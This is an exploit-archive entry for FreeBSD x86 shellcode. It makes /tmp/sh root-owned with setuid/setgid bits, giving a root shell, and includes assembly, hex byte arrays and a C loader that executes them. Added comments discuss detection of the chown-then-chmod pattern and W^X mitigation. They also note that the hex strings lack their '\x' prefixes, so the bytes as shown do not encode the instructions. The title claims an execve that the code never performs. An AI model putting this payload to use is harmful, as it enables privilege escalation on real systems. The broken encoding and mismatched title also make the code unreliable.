# Title : freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes
# Published : 2004-09-26
# Author : Claes Nyberg
/*
* FreeBSD shellcode
* chown("/tmp/sh", 0, 0); chmod("/tmp/sh", 06755);
* 44 bytes
*
* Claes M. Nyberg 20020209
*
* <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
*/
/*************************************************************
void
main(void)
{
__asm__("
xor %eax, %eax # eax = 0
pushl %eax # string ends with NULL
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = &string[0]
push %eax # 0
push %eax # 0
push %ebx # /tmp/sh
push %eax # Dummy
mov $0x10, %al # eax = 16 = chown
int $0x80 # chown(/tmp/sh, 0, 0);
xor %eax, %eax # eax = 0
or $0xded, %ax # eax = 06755
pushl %eax # 06755
push %ebx # /tmp/sh
pushl %eax # dummy
xor %eax, %eax # eax = 0
mov $0xf, %al # eax = 15 = chmod
int $0x80 # chmod(/tmp/sh, 06755);
mov $0x1, %al # eax = 1 = exit
push %eax # exit value = 1
push %eax # Dummy
int $0x80 # exit(1);
");
}
*************************************************************/
#include <stdio.h>
#include <string.h>
/*
 * Byte-by-byte encoding of the assembly in the comment block above, one
 * instruction per line with its mnemonic alongside.  Kept for reference
 * only: main() measures this array with strlen() but jumps into the
 * packed copy _freebsd_code below.
 *
 * Per the mnemonics the sequence performs chown(path, 0, 0), then
 * chmod(path, 06755), then exit(1) via int $0x80 -- i.e. it turns an
 * existing file into a root-owned setuid/setgid binary.  For audit and
 * detection purposes that pair (ownership change to root immediately
 * followed by a mode change adding the setuid/setgid bits on a file in
 * /tmp) is the high-signal event.
 *
 * NOTE(review): in this copy the "\x" escape prefix is missing from every
 * hex pair, so the literal holds the characters 'x','3','1',... rather
 * than the bytes the mnemonics describe; the text as shown does not
 * encode those instructions, and strlen() of it is not the 44 bytes the
 * header claims.
 */
static char freebsd_code[] =
"x31xc0" /* xor %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x10" /* mov $0x10, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax, %eax */
"x66x0dxedx0d" /* or $0xded, %ax */
"x50" /* pushl %eax */
"x53" /* push %ebx */
"x50" /* pushl %eax */
"x31xc0" /* xor %eax, %eax */
"xb0x0f" /* mov $0xf, %al */
"xcdx80" /* int $0x80 */
"xb0x01" /* mov $0x1, %al */
"x50" /* push %eax */
"x50" /* push %eax */
"xcdx80"; /* int $0x80 */
/*
 * The same sequence as freebsd_code, packed eight bytes per line without
 * per-instruction comments; this is the array main() transfers control
 * into through a function-pointer cast.  The missing "\x" prefixes noted
 * on freebsd_code apply here as well.
 *
 * Running it at all depends on the writable data segment being mapped
 * executable.  On a system enforcing W^X / non-executable data the
 * indirect call in main() faults before any int $0x80 is reached, which
 * is the mitigation this style of loader is sensitive to.
 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x50x53x50xb0x10xcdx80x31"
"xc0x66x0dxedx0dx50x53x50"
"x31xc0xb0x0fxcdx80xb0x01"
"x50x50xcdx80";
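/*
 * Entry point: prints the length of the annotated byte string, then
 * transfers control into _freebsd_code by treating its address as a
 * function pointer.
 *
 * Fixes relative to the original: main() returns int as the standard
 * requires; strlen() yields a size_t, so the format must be %zu (the
 * original %d is undefined behaviour for that argument); and the
 * trailing newline had lost its backslash.
 *
 * The indirect call only works where the data segment is executable; on
 * a system enforcing W^X / non-executable data it faults instead.  The
 * printed length equals the byte count only because the intended
 * sequence contains no 0x00 byte, which strlen() would treat as the end.
 *
 * Returns 0 if control ever comes back from code(); in the original
 * intent it does not, because the sequence ends in exit(1).
 */
int
main(void)
{
	/* Cast to a concrete function-pointer type rather than via void *,
	 * so the conversion is explicit at the one place it happens. */
	void (*code)(void) = (void (*)(void))_freebsd_code;

	printf("strlen code: %zu\n", strlen(freebsd_code));
	code();
	return 0;
}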